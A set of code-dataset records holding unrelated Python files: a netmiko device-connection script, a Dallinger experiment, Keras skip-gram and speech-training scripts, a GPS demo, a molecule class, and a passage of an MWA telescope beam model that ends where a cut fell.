+{"seq_id":"326936553","text":"import yaml\nimport netmiko\n\nfilename = input(\"Enter Filename\")\n\nwith open(filename) as f:\n yaml_out = yaml.load(f)\n \n for keys in yaml_out:\n net_connect = netmiko.ConnectHandler(**keys)\n print(net_connect.find_prompt())\n \n\nprint(yaml_out)\n","sub_path":"class3_practice_2b.py","file_name":"class3_practice_2b.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"204844064","text":"\"\"\"Define an experiment to explore joint decision making.\"\"\"\n\nfrom dallinger.experiments import Experiment\nfrom dallinger.models import Network, Node, Info\nfrom sqlalchemy import Integer\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.sql.expression import cast\nfrom dallinger.nodes import Source\nfrom random import randint\nimport json\n\n\nclass JointEstimation(Experiment):\n \"\"\"An experiment for joint perception.\"\"\"\n\n def __init__(self, session):\n \"\"\"Call the same function in the super (see experiments.py in dallinger).\n\n A few properties are then overwritten. Finally, setup() is called.\n \"\"\"\n super(JointEstimation, self).__init__(session)\n import models\n self.models = models\n self.experiment_repeats = 1\n self.setup()\n self.num_participants = 10 # desired total participants, not dyads\n self.initial_recruitment_size = 10\n self.completion_bonus_payment = .33\n self.accuracy_bonus_payment = 2\n self.total_test_trials = 15\n\n def create_network(self):\n \"\"\"Create a new network.\"\"\"\n return self.models.Paired()\n\n def create_node(self, participant, network):\n \"\"\"Create a new node.\"\"\"\n return self.models.Indexed(participant=participant, network=network)\n\n def setup(self):\n \"\"\"Create networks. 
Add a source if the networks don't yet exist.\"\"\"\n if not self.networks():\n for _ in range(self.practice_repeats):\n network = self.create_network()\n network.role = \"practice\"\n self.session.add(network)\n self.models.ListSource(network=network)\n for _ in range(self.experiment_repeats):\n network = self.create_network()\n network.role = \"experiment\"\n self.session.add(network)\n self.models.ListSource(network=network)\n self.session.commit()\n\n def bonus(self, participant):\n \"\"\"Calculate a participant's bonus.\"\"\"\n\n # Get only the \"info\" from target participant's nodes.\n all_nodes = participant.nodes()\n experiment_nodes = [n for n in all_nodes if n.network.role == \"experiment\"]\n nested_infos = [n.infos() for n in experiment_nodes]\n flattened_infos = [info_item for info_list in nested_infos for info_item in info_list]\n\n # Grab their final accuracy scores.\n score = [float(info.property3) for info in flattened_infos] # get the accuracy of the infos\n\n # If they timed out, give them no bonuses.\n if -9999999999999999999999999999 in score:\n bonus = 0.0\n\n # Otherwise,\n else:\n score = filter(lambda a: a > 0, score)\n score = score + [0] * (self.total_test_trials - len(score))\n mean_accuracy = float(sum(score))/float(self.total_test_trials)\n bonus = round(min((self.accuracy_bonus_payment+self.completion_bonus_payment), max(0.0, ((mean_accuracy * self.accuracy_bonus_payment) + self.completion_bonus_payment))),2)\n return bonus\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277512693","text":"# Basic Skip Gram model\n\nfrom keras.layers import merge, Dense, Reshape, Dot\nfrom keras.layers.embeddings import Embedding\nfrom keras.models import Sequential, Model\n\nfrom keras.preprocessing.text import *\nfrom keras.preprocessing.sequence import skipgrams\n\nVOCAB_SIZE = 5000\nEMBED_SIZE = 300\n\n'''\nword_model = Sequential()\nword_model.add(Embedding(VOCAB_SIZE, EMBED_SIZE, embeddings_initializer='glorot_uniform', input_length=1))\nword_model.add(Reshape(EMBED_SIZE, ))\n\ncontext_model = Sequential()\ncontext_model.add(Embedding(VOCAB_SIZE, EMBED_SIZE, embeddings_initializer='glorot_uniform', input_length=1))\ncontext_model.add(Reshape(EMBED_SIZE, ))\n\nmergedOut = Dot()([word_model.output,context_model.output])\nmergedOut = Dense(1, activation='sigmoid')(mergedOut)\nmodel = Model([word_model.input, context_model.input], mergedOut)\n'''\ntext = \"I love green eggs and ham .\"\ntokenizer = Tokenizer()\n\ntokenizer.fit_on_texts([text])\n\nword2id = tokenizer.word_index\nid2word = {v:k for k, v in word2id.items()}\n\nwids = [word2id[w] for w in text_to_word_sequence(text)]\npairs, labels = skipgrams(wids, len(word2id))\nprint(len(pairs), len(labels))\nfor i in range(10):\n print(\"({:s} ({:d}), {:s} ({:d})) -> {:d}\".format(\n id2word[pairs[i][0]], pairs[i][0],\n id2word[pairs[i][1]], pairs[i][1],\n labels[i]))\n\n\n\n\n","sub_path":"dl_with_keras/word_embeddings/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"283348630","text":"#\n# Project : \"Station de qualité de l'air Lora\"\n#\n# Copyright (C) 2019 Yohann LE GALL & Sergio QUINTERO\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the 
Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n\n\n# Simple GPS module demonstration.\n# Will wait for a fix and print a message every second with the current location\n# and other details.\nfrom machine import UART\nfrom machine import Pin\nimport utime as time\n\nfrom lib import adafruit_gps\n\n#Initialize UART\nuart = UART(1, baudrate=9600, timeout_chars=3000, pins=('P4', 'P3'))\n\n#Instantiate a Pin object linked to the enable pin of the GPS\nen_pin = Pin('P23', mode=Pin.OUT)\n\n#Instantiate a GPS object\ngps = adafruit_gps.GPS(uart, en_pin)\n\n#Turns ON GPS (turn off using gps.disable())\ngps.enable()\n\n# Turn on the basic GGA and RMC info (what you typically want)\ngps.send_command('PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')\n\n# Set update rate to once a second (1hz).\ngps.send_command('PMTK220,1000')\n# Set update rate to once every two seconds (0.5hz).\n#gps.send_command('PMTK220,2000')\n# Set update rate to twice a second (2hz).\n#gps.send_command('PMTK220,500')\n\n# Main loop runs forever printing the location, etc. every second.\nlast_print = time.ticks_ms()\nwhile True:\n # Make sure to call gps.update() as often as possible to prevent loss\n # of data.\n # This returns a bool that's true if it parsed new data.\n gps.update()\n # Every second print out current location details if there's a fix.\n current = time.ticks_ms()\n if time.ticks_diff(last_print, current) >= 1000:\n last_print = current\n\n if not gps.has_fix:\n # Try again if we don't have a fix yet.\n print('Waiting for fix...')\n continue\n\n # We have a fix! (gps.has_fix is true)\n # Print out details about the fix like location, date, etc.\n print('=' * 40) # Print a separator line.\n print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(\n gps.timestamp_utc[1], # Grab parts of the time from the\n gps.timestamp_utc[2], # struct_time object that holds\n gps.timestamp_utc[0], # the fix time. Note you might\n gps.timestamp_utc[3], # not get all data like year, day,\n gps.timestamp_utc[4], # month!\n gps.timestamp_utc[5]))\n print('Latitude: {} degrees'.format(gps.latitude))\n print('Longitude: {} degrees'.format(gps.longitude))\n print('Fix quality: {}'.format(gps.fix_quality))\n # Some attributes beyond latitude, longitude and timestamp are optional\n # and might not be present. 
Check if they're None before trying to use!\n if gps.satellites is not None:\n print('# satellites: {}'.format(gps.satellites))\n if gps.altitude_m is not None:\n print('Altitude: {} meters'.format(gps.altitude_m))\n if gps.track_angle_deg is not None:\n print('Speed: {} knots'.format(gps.speed_knots))\n if gps.track_angle_deg is not None:\n print('Track angle: {} degrees'.format(gps.track_angle_deg))\n if gps.horizontal_dilution is not None:\n print('Horizontal dilution: {}'.format(gps.horizontal_dilution))\n if gps.height_geoid is not None:\n print('Height geo ID: {} meters'.format(gps.height_geoid))\n","sub_path":"tests/gps_simpletest.py","file_name":"gps_simpletest.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"632794575","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 5 11:20:29 2018\n\n@author: sulem\n\"\"\"\n\nfrom rdkit import Chem\nfrom rdkit.Chem import ChemicalFeatures\nfrom rdkit import RDConfig\n\nfrom preprocessing.atom import *\n\nclass Molecule():\n \n #Constructor\n def __init__(self,atoms=None,bonds=None,tag=None,ident=None,\n A=0.0,B=0.0,C=0.0,mu=0.0,alpha=0.0,\n homo=0.0,lumo=0.0,r2=0.0,zpve=0.0,\n U0=0.0,U=0.0,H=0.0,G=0.0,Cv=0.0,frequencies=None,\n smile=None,chemMol=None):\n \n self.tag = tag\n self.ident = ident\n \n self.atoms = atoms\n self.bonds = bonds\n if (atoms == None):\n self.Na = 0\n else: \n self.Na = len(atoms)\n \n self.A = A\n self.B = B\n self.C = C\n self.mu = mu\n self.alpha = alpha\n self.homo = homo\n self.lumo = lumo\n self.gap = lumo - homo\n self.r2 = r2\n self.zpve = zpve\n self.U0 = U0\n self.U = U\n self.H = H\n self.G = G\n self.Cv = Cv\n self.freq = frequencies\n self.smile = smile\n self.chemMol = chemMol\n \n \n def add_atom(self,atom):\n \n if (self.atoms == None):\n self.atoms = []\n self.atoms.append(atom)\n self.Na += 1\n \n \n def add_bond(self,atom1,atom2,bond=1.0,distance=0.0):\n \n self.bonds.append(Chemic_bond(atom1,atom2,bond,distance))\n \n \n def add_atom_coord(self,i,coord):\n self.atoms[i].coord = coord\n \n \n def add_atom_pc(self,i,pc):\n self.atoms[i].pc = pc\n \n \n def get_atomlist(self):\n \n return ([a.symb for a in self.atoms])\n \n \n \n \n \n \n ","sub_path":"preprocessing/molecule.py","file_name":"molecule.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"500038637","text":"import sugartensor as tf\nfrom data import SpeechCorpus\nfrom data_ch import voca_size\nfrom model import *\n\n__author__ = 'namju.kim@kakaobrain.com'\n\n# set log level to debug\ntf.sg_verbosity(10)\n\n#\n# hyper parameters\n#\n\nbatch_size = 16 # total batch size\n\n#\n# inputs\n#\n\n# corpus input tensor\ndata = SpeechCorpus(batch_size=batch_size * tf.sg_gpus())\n\n# mfcc feature of audio\ninputs = tf.split(data.mfcc, tf.sg_gpus(), axis=0)\n# target sentence label\nlabels = tf.split(data.label, tf.sg_gpus(), axis=0)\n# sequence length except zero-padding\nseq_len = []\nfor input_ in inputs:\n seq_len.append(tf.not_equal(input_.sg_sum(axis=2), 0.).sg_int().sg_sum(axis=1))\n\n\n# parallel loss tower\n@tf.sg_parallel\ndef get_loss(opt):\n # encode audio feature\n logit = get_logit(opt.input[opt.gpu_index], voca_size=voca_size)\n for i in tf.get_collection(\"regularization_losses\"):\n print(i)\n print('--------------------')\n\n train_list = tf.trainable_variables()\n\n var_list = tf.global_variables()\n 
real_var_list = []\n for item in var_list:\n # print(item)\n if 'W' in item.name:\n real_var_list.append(item)\n\n loss = logit.sg_ctc(target=opt.target[opt.gpu_index], seq_len=opt.seq_len[opt.gpu_index])\n # print(loss)\n # tf.add_to_collection(\"losses\", loss)\n # losses = tf.get_collection(\"losses\")\n # losses += tf.get_collection(\"regularization_losses\")\n # for i in tf.get_collection(\"losses\"):\n # print(i.name)\n # print('++++++++++++++++++++')\n # total_loss = tf.add_n(losses, name='total_loss')\n # for item in real_var_list:\n # loss += 0.03 * tf.nn.l2_loss(item)\n\n # for i in tf.get_collection(\"regularization_losses\"):\n # loss += 0.03 * i\n\n regular_loss = tf.sg_regularizer_loss(0.03)\n loss += regular_loss\n return loss\n\n\n#\n# train\n#\ntf.sg_train(lr=0.0001, loss=get_loss(input=inputs, target=labels, seq_len=seq_len),\n ep_size=data.num_batch, max_ep=50)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"404969156","text":"info= [int(x) for x in input('').split(' ')]\narr = [int(x) for x in input('').split(' ')]\nsub = [int(x) for x in input('').split(' ')]\nn = 0\nindex = n\nwhile n < (len(arr)-len(sub)+1):\n index = n\n for x in range(len(sub)):\n if arr[n+x] != sub[x]:\n index = -1\n break\n if index != -1:\n break\n n += 1\nprint(index)\n \n","sub_path":"auacm/arraysearch.py","file_name":"arraysearch.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"360231562","text":"#!/usr/bin/python\n\"\"\"beam_full_EE.py\nDetermine complex voltage response of an aperture array modelled as embedded elements, \nrepresented by spherical harmonics. \n\nUsage:\nAn ApertureArray object is created for a target frequency.\nA Beam object takes an ApertureArray object and antenna delays and amplitude \nas input, calculates the beam response as the weighted sum of \nthe spherical harmonics of the embedded elements.\nThe Beam object can then be queried to return the response at \nspherical coordinates or interest, to an arbitrary angular resolution.\nThe response can either be calculated at the given points, or for faster \nprocessing, interpolated from a gridded beam.\n\nA gridded beam is significantly faster for a large number of points, \nas the time-consuming calculation of the response \nneed only be done once for each theta (ZA) and each phi (az) angle. \nThe calculation for each (theta,phi) point is then a simple multiplication.\nA linear interpolation from the gridded beam is required as the \nslant orthographic projection results in many unique theta (ZA) and phi (az) points, \nbut this is also relatively fast.\n\nIf this module is run stand-alone, \nthe a beam will be generated and the various outputs plotted.\n\nOriginal Matlab code by Adrian Sutinjo. Ported to Python by Tim Colegate. 
\nSee:\nCalculating Far-Field Radiation Based on FEKO\n Spherical Wave Coefficients, draft 10 June 2015\n \n\"\"\"\n\nimport numpy as np\nimport logging, os\nimport math\nfrom scipy import misc\nfrom scipy.special import lpmv #associated Legendre function\nfrom mwapy import pb\nimport datetime #For info-level logging\n\nlogging.basicConfig(format='# %(levelname)s:%(name)s: %(message)s')\nlogger=logging.getLogger(__name__) # default logger level is WARNING\n#logger.setLevel('WARNING')\n\ntry:\n import h5py\nexcept ImportError:\n logger.warning(\"Cannot import h5py module -> Full Embedded Model cannot be used, but other beam models should work fine\")\n \n\ndeg2rad=math.pi/180\nrad2deg=180/math.pi\n\n#Todo: check scipy.__version__ >= '0.15.1'\n\n\nclass ApertureArray:\n \"\"\"Generic aperture array class\"\"\"\n#TODO: add some checks to h5 file. e.g. check n_ant matches number in h5 file.\n#TODO: in the beam modelling, there is still 16 antenna hardcoded. This needs fixing.\n def __init__(self, h5filepath, target_freq_Hz, n_ant=16):\n #freq_interp=nearest, linear\n \"\"\"Constructor for beamformed aperture array. \n Input: \n h5filepath - path to h5 file containing coefficients\n target_freq_Hz - frequency at which beam model is required\n n_ant - number of antennas in array/tile\"\"\"\n logger.info('New model of the physical tile, modelled using full embedded element patterns with the beam described by spherical harmonics.')\n logger.info('This new beam model is still being tested and is not an official release')\n logger.info('Code version date: 2016-02-15')\n \n #load h5file\n if not os.path.exists(h5filepath):\n logger.error('Cannot file beam model file %s' % h5filepath)\n self.h5f=None\n else:\n logger.debug('Loading beam model from file %s' % h5filepath)\n self.h5f = h5py.File(h5filepath,'r')\n\n # read and log version information :\n self.h5_file_version=pb.h5fileversion\n logger.debug(\"H5 file (%s) version = %s\" % (h5filepath,self.h5_file_version)) \n\n # Find available frequencies in h5 file\n freqs=np.array([int(x[3:]) for x in self.h5f.keys() if 'X1_' in x])\n freqs.sort()\n\n # find the nearest freq lookup table\n pos = np.argmin(np.abs(freqs - target_freq_Hz))\n self.freq=freqs[pos]\n logger.info(\"%s MHz requested, selecting nearest freq: %s MHz\"%(target_freq_Hz/1.e6, self.freq/1.e6))\n\n self.n_ant=n_ant\n\n def calc_zenith_norm_fac(self):\n \"\"\"Calculate normalisation factors for the Jones vector for this \n ApertureArray object. For MWA, these are at the zenith of a zenith pointed beam,\n which is the maximum for all beam pointings. \n The FEKO simulations include all ph angles at za=0. These are not redundant, \n and the ph value determines the unit vector directions of both axes. \n For the E-W dipoles, the projection of the theta unit vec will be max when \n pointing east, i.e. when ph_EtN=0 (ph_NtE=90). 
For the phi unit vec, \n this will be when ph_EtN=-90 or 90 (ph_NtE=180 or 0: we use 180)\n For the N-S dipoles, projection of ZA onto N-S is max az ph_EtN=90 (ph_NtE=0) and\n proj of ph onto N-S is max when ph_EtN=0 (ph_NtE=90)\"\"\"\n \n mybeam=Beam(self, delays=np.zeros([2,16]), amps=np.ones([2,16]))\n self.norm_fac=np.zeros((2,2),dtype=np.complex128)\n \n #fill in Jones matrix\n max_phis=[[math.pi/2,math.pi],[0,math.pi/2]] #phi where each Jones vector is max \n for i in [0,1]:\n for ii in [0,1]:\n self.norm_fac[i][ii]=\\\n mybeam.get_response(max_phis[i][ii], 0)[i][ii][0]\n \n def apply_zenith_norm_Jones(self, j):\n \"\"\"Apply zenith normalisation factor to the Jones matrix\n \n Input:\n j - Jones matrix for one or more spherical cordinates\n \"\"\"\n if not hasattr(self, 'norm_fac'):\n self.calc_zenith_norm_fac()\n #Resize to extra dimensions for subsequent broadcasting during normalisation\n mynorm_fac=np.copy(self.norm_fac)\n for i in range(len(j.shape)-2):\n mynorm_fac=np.expand_dims(mynorm_fac,axis=2)\n return j/mynorm_fac #Normalise\n \n\nclass Beam:\n def __init__(self, AA, delays=np.zeros([2,16]), amps=np.ones([2,16])):\n \"\"\"Constructor for aperture array beam of given pointing direction\n and angular resolution.\n Spherical harmonics modes and coefficients are accumulated for\n a pointing defined by delays and amps.\n \n The format of the modes and coefficients is as follows: \n Q1,2 is Q1,2mn column vector with m=[-n:n].' and n=[111]....[n,..n].' \n M and N assume FEKO M and N vector order, e.g,...: \n -----------M, N------------\n -1 1\n 0 1\n 1 1\n -2 2\n -1 2\n 0 2\n 1 2\n 2 2\n .. ..\n -nmax nmax\n .. ..\n 0 nmax\n .. ..\n nmax nmax\n \n Input:\n AA - aperture array object antenna object\n freq - frequency of interest (Hz) \n delays - 2-D array of MWA beamformer delay steps as numpy array shape (2,16),\n although a (16,) list or a (16,) array will also be accepted \n 1st dimension is the antenna pol (NS, EW) \n 2nd dimension is the antenna number\n amps - 2-D array of antenna amplitudes. These are absolute values \n (i.e. relatable to physical units) \n pixels_per_deg - angular resolution, being the number of pixels per degree along Az and ZA axes\"\"\"\n \n self.AA=AA\n \n # Check valid amplitudes\n try:\n if isinstance(amps,list):\n amps=np.array(amps) \n if amps.shape == (16,):\n logger.warning('Assuming set of 16 antenna amplitudes are apply to both X Y dipoles')\n amps=np.tile(amps, (2,1))\n except:\n e = 'Unable to convert amplitudes \"%s\" to shape (2,16)' % (amps)\n logger.error(e)\n raise ValueError(e)\n if amps.shape != (2,16):\n e = 'Amplitudes \"%s\" are not shape (2,16)' % (amps)\n logger.error(e)\n raise ValueError(e)\n\n# #TODO: read number of antennas (i.e. delays) from h5 file\n # Check valid delays\n try:\n if isinstance(delays,list):\n delays=np.array(delays) \n if delays.shape == (16,):\n logger.warning('Assuming set of 16 antenna delays apply to both X and Y dipoles')\n delays=np.tile(delays, (2,1))\n except:\n e = 'Unable to convert delays \"%s\" to shape (2,16)' % (delays)\n logger.error(e)\n raise ValueError(e)\n if delays.shape != (2,16):\n e = 'Delays \"%s\" are not shape (2,16)' % (delays)\n logger.error(e)\n raise ValueError(e)\n \n if (delays >32).any():\n e = 'There are delays greater than 32: \"%s\"' % (delays)\n logger.error(e)\n raise ValueError(e)\n \n #check for terminated dipoles and reset delays and amps\n terminated=delays==32\n if (terminated).any():\n logger.warning('Terminated dipoles (delay setting 32)... 
setting amplitude and delay to zero.')\n delays[terminated]=0\n amps[terminated]=0\n \n logger.info('Using delays X=%s, Y=%s'%(delays[0], delays[1]))\n self.delays=delays\n \n logger.info('Using amplitudes X=%s, Y=%s'%(amps[0], amps[1]))\n self.amps=amps \n \n \n self.calc_beam_modes()\n \n def calc_beam_modes(self):\n \"\"\"Calculate (accumulate) modes for beam object initialised \n with delays and amplitudes\"\"\"\n self.beam_modes={}\n pols=['X','Y']\n for pol in [0,1]:\n logger.debug('Calculate (accumulate) modes for %s-pol beam. Time is %s'%(pols[pol],datetime.datetime.now().time()))\n #Calculate complex excitation voltages\n phases=2*math.pi*self.AA.freq*-self.delays[pol]*435e-12 #convert delay to phase \n Vcplx=self.amps[pol]*np.exp(1.0j*phases) #complex excitation col voltage\n \n #sum up modes to create beam described by spherical harmonics \n logger.debug('determine theta-dependent component...')\n\n #finding maximum length of modes for this frequency\n max_length=0 #initialize\n n_ant=self.AA.n_ant#Was hardcoded to 16\n for ant_i in range(n_ant):\n #select spherical wave table\n name='%s%s_%s'%(pols[pol],ant_i+1,self.AA.freq)\n \n #find maximum length\n if self.AA.h5f[name].shape[1]/2 > max_length:\n max_length=self.AA.h5f[name].shape[1]/2\n \n #accumulating spherical harmonics coefficients for the array\n #initialize\n Q1_accum=np.zeros(max_length,dtype=np.complex128)\n Q2_accum=np.zeros(max_length,dtype=np.complex128)\n \n #Read in modes\n Q_modes_all = self.AA.h5f['modes'].value.T\n Nmax=0\n for ant_i in range(n_ant):\n #re-initialise Q1 and Q2 for every antenna\n Q1=np.zeros(max_length,dtype=np.complex128)\n Q2=np.zeros(max_length,dtype=np.complex128)\n\n #select spherical wave table\n name='%s%s_%s'%(pols[pol],ant_i+1,self.AA.freq)\n Q_all = self.AA.h5f[name].value.T\n\n #current length\n my_len=np.max(Q_all.shape)\n my_len_half=my_len/2\n \n Q_modes = Q_modes_all[0:my_len,:] #Get modes for this antenna\n \n #convert Qall to M, N, Q1, Q2 vectors for processing\n\n #find s=1 and s=2 indices\n #only find s1 and s2 for this antenna\n s1=Q_modes[0:my_len,0]<=1\n s2=Q_modes[0:my_len,0]>1\n\n #grab m,n vectors\n M=Q_modes[s1,1]\n N=Q_modes[s1,2]\n \n #update to the larger M and N \n if np.max(N)>Nmax:\n M_accum=M\n N_accum=N\n Nmax=np.max(N_accum)\n\n #grab Q1mn and Q2mn and make them complex\n Q1[0:my_len_half]=Q_all[s1,0]*np.exp(1.0j*Q_all[s1,1]*deg2rad)\n Q2[0:my_len_half]=Q_all[s2,0]*np.exp(1.0j*Q_all[s2,1]*deg2rad)\n \n #accumulate Q1 and Q2, scaled by excitation voltage\n Q1_accum=Q1_accum+Q1*Vcplx[ant_i]\n Q2_accum=Q2_accum+Q2*Vcplx[ant_i]\n self.beam_modes[pols[pol]]={'Q1':Q1_accum,'Q2':Q2_accum,\n 'M':M_accum, 'N':N_accum} \n\n def get_response(self, phi_arr, theta_arr):\n \"\"\"Calculate full Jones matrix response (E-field) of beam for \n one or more spherical coordinates\n\n Input: \n phi_arr and theta_arr are single values or arrays of equal shape \n \n phi_arr - azimuth angles (radians), north through east.\n theta_arr - zenith angles (radian)\n \n Output:\n Jones - A multi-dimensional array, comprising an array of shape(phi_arr), \n with [2][2] at the start for the Jones vectors, where \n [J_11=Xtheta J_12=Xphi]\n [J_21=Ytheta J_21=Yphi]\n \"\"\"\n \n #==============================================================================\n # Code showing that (Jones, az, za) is faster than (az, za, Jones)\n # a = np.random.rand(5000, 5000, 2, 2)\n # timeit -n 100 a[:,:,0,0].sum()\n # -> 100 loops, best of 3: 55.2 ms per loop\n # b = np.random.rand(2,2,5000, 5000)\n # timeit 
-n 100 b[0,0].sum()\n # -> 100 loops, best of 3: 18.1 ms per loop\n #==============================================================================\n \n #Convert to numpy array (if not already numpy array)\n try:\n phi_arr=np.array(phi_arr, copy=False, ndmin=1)\n theta_arr=np.array(theta_arr, copy=False, ndmin=1)\n except:\n e = 'Unable to convert theta and phi to numpy arrays'\n logger.error(e)\n raise ValueError(e) \n \n if phi_arr.ndim == 0 and theta_arr.ndim == 0: #Convert single value to array\n phi_arr = np.reshape(phi_arr, (1)) \n theta_arr = np.reshape(theta_arr, (1)) \n #Calculate for each point\n logger.debug('Calculating beam for each point in %s... %s'%(phi_arr.shape,datetime.datetime.now().time()))\n Jones = self.get_FF(phi_arr, theta_arr, grid=False)\n \n return Jones\n \n def get_interp_response(self, phi_arr, theta_arr, pixels_per_deg=5):\n \"\"\"Calculate full Jones matrix response (E-field) of beam interpolated \n from a beam calculated on a 2-D grid of spherical coordinates at \n resolution pixels_per_deg pixels per degree.\n Where the input is many unique theta and phi coordinates, \n this approach is faster than calculating the response for each \n unique coordinate. \n\n Input: \n phi_arr and theta_arr are arrays of equal shape defining points \n where the response is required\n \n phi_arr - azimuth angles (radians), north through east.\n theta_arr - zenith angles (radian)\n pixels_per_deg - number of pixels per degree along phi and theta axes \n which is then interpolarted on the phi_arr,theta_arr coords\n \n Output:\n Jones - A 4-D array, comprising a 2-D array of shape(phi_arr), \n with [2][2] at the start for the Jones vectors, where \n [J_11=Xtheta J_12=Xphi]\n [J_21=Ytheta J_21=Yphi]\n \"\"\"\n \n #RegularGridInterpolator only needed for this function.\n #FIXME: version check, as it's not available on earlier scipy versions\n from scipy.interpolate import RegularGridInterpolator\n \n #TODO: find min & max of phi_arr & theta_arr so that a subset of the \n #grid can be calculated (instead of the whole 0-360, 0-90 grid)\n \n #Convert to numpy array (if not already numpy array)\n try:\n phi_arr=np.array(phi_arr, copy=False, ndmin=1)\n theta_arr=np.array(theta_arr, copy=False, ndmin=1)\n \n except:\n e = 'Unable to convert theta and phi to numpy arrays'\n logger.error(e)\n raise ValueError(e) \n\n logger.debug('Calculating a gridded beam and interpolating onto coordinates of shape %s...'%(phi_arr.shape,))\n #Interpolate from gridded beam\n Jones=np.zeros((2,2)+np.shape(phi_arr),dtype=np.complex128)\n \n logger.debug('Calculating gridded beam (Az=0-360, ZA=0-90) at angular resolution %s pixels per degree... %s'%(pixels_per_deg, datetime.datetime.now().time()))\n if pixels_per_deg < 5:\n logger.warning(\"Resolution along theta, phi axes is less than 5 pixels per degree. Results may be less reliable\") \n\n #Calculate beam for a phi (NtE), theta grid with angular resolution specified by pixels_per_deg. \n mygrid=get_grid('rad', pixels_per_deg) \n gridded_Jones=self.get_FF(mygrid['phi_1D'], mygrid['theta_1D'],grid=True)\n \n logger.debug('Interpolating... 
%s'%datetime.datetime.now().time())\n for i in [0,1]:\n for ii in [0,1]:\n #Interpolate real and imag separately (just to be sure) and reconstruct\n my_interp_fn_real=RegularGridInterpolator((mygrid['phi_1D'], mygrid['theta_1D']), \n gridded_Jones[i,ii].real,\n bounds_error=False) #bounds_error=False interpolates NaNs to NaN\n my_real=my_interp_fn_real(np.dstack([phi_arr, theta_arr]))\n \n my_interp_fn_imag=RegularGridInterpolator((mygrid['phi_1D'], mygrid['theta_1D']), \n gridded_Jones[i,ii].imag,\n bounds_error=False) #bounds_error=False interpolates NaNs to NaN\n my_imag=my_interp_fn_imag(np.dstack([phi_arr, theta_arr])) \n Jones[i,ii]=my_real+1j*my_imag\n logger.debug('Done... %s'%datetime.datetime.now().time())\n\n return Jones \n \n def get_FF(self, phi_arr, theta_arr, grid):\n \"\"\" \n Converts the beam object's spherical harmonics to a Jones matrix of \n an E-field (polarized in \\hat{theta} and \\hat{phi}).\n \n Input:\n phi_arr - Array of azimuth angles (radians), north through east\n theta_arr - Array of zenith angles \n grid - If True, will return a 2-D array based on input theta, phi. \n If False will return a array of size of input theta, phi.\n \n Output:\n #E_P - phi polarized field\n #E_T - theta polarazed field\n Sigma_T - Sigma_T is theta polarized field without the\n sqrt(Zo/(2pi))*7exp(-jbeta r)/r factor\n Sigma_P - Similarly for Sigma_P\"\"\"\n \n if grid==True:\n #Create 4-D Jones matrix of shape: 2 x 2 x n_phi x n_theta\n if phi_arr.ndim != 1 and theta_arr.ndim != 1:\n e='For gridded beam, theta (shape %s) and phi (shape %s) must be 1-D arrays'%\\\n (np.shape(theta_arr),np.shape(phi_arr))\n logger.error(e)\n raise ValueError(e)\n Jones=np.zeros((2,2,len(phi_arr),len(theta_arr)),dtype=np.complex128) \n else:\n #Create Jones matrix of shape: 2 x 2 x shape(phi_arr) \n if phi_arr.shape != theta_arr.shape:\n e='Theta (shape %s) and phi (shape %s) must be the same shape'%\\\n (np.shape(theta_arr),np.shape(phi_arr))\n logger.error(e)\n raise ValueError(e) \n Jones=np.zeros((2,2)+np.shape(phi_arr),dtype=np.complex128)\n \n counter=10000 #Counter for messages\n \n phi_arr=math.pi/2-phi_arr #Convert to East through North (FEKO coords)\n phi_arr[phi_arr < 0] += 2*math.pi #360 wrap\n\n pols=['X','Y']\n for pol in [0,1]: \n #Extract modes for this pol\n M=self.beam_modes[pols[pol]]['M']\n N=self.beam_modes[pols[pol]]['N'] \n Q1=self.beam_modes[pols[pol]]['Q1']\n Q2=self.beam_modes[pols[pol]]['Q2'] \n \n #form P(cos\\theta)/(sin\\theta) and P^{m+1}(cos\\theta)with FEKO M,N order\n nmax=int(np.max(N))\n if np.max(N)-nmax !=0:\n logger.error('The maximum of N should be an integer value!')\n \n #form pre-multiplying constants in (1) of \"Calculating....\"\n C_MN=(0.5*(2*N+1)*misc.factorial(N-abs(M))/misc.factorial(N+abs(M)))**0.5\n \n MabsM=-M/np.abs(M)\n MabsM[MabsM==np.NaN]=1 #for M=0, replace NaN with MabsM=1; \n MabsM=(MabsM)**M\n \n if len(phi_arr.ravel()) > counter:\n logger.debug('Time is %s'%datetime.datetime.now().time())\n logger.warning('Calculating for %s points. 
